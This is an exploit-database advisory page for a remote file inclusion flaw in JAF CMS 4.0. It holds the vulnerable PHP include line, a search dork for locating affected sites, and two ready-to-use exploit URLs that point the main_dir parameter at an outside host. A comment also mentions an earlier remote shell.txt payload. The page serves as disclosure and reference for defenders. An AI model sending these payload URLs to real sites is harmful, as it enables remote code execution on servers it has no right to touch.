header-logo
Suggest Exploit
vendor:
JAF CMS
by:
ThE TiGeR
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: JAF CMS
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: NO
Related CWE: N/A
CPE: a:jaf_cms:jaf_cms:4.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

JAF CMS Remote file include (website)

JAF CMS version 4.0 is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any file inclusion operations.
Source

Exploit-DB raw data:

#===========================================================================================
#JAF CMS Remote file include (website)
#===========================================================================================
#
#Script name : JAF CMS
#
#Version : 4.0
#
#===========================================================================================
#Vulnerable Code :
#
# if(isset($category) || isset($id)) { include($website.$main_dir."forum.php"); return;}
#
#===========================================================================================
#Dork : powered by JAF CMS © 2004 - 2006
#
#Exploit :
#(1)
#http://www.site.com/[jmf_path]/module/forum/main.php?id=1&main_dir=http://www.milw0rm.com/index.php?&
#(2)
#http://www.site.com/[jmf_path]/module/forum/headlines.php?id=1&main_dir=http://www.milw0rm.com/index.php?&
#
#===========================================================================================
#
#Discoverd By : ThE TiGeR
#
#Contact : miro_tiger100[at]hotmail[dot]com
#
#===========================================================================================

/*
 * modified the authors GET request from
 * ?website=http://www.site.com/shell.txt?
 * to the current. /str0ke
 */

# milw0rm.com [2006-10-04]

Navigation

Suggest Exploit

Services By CQR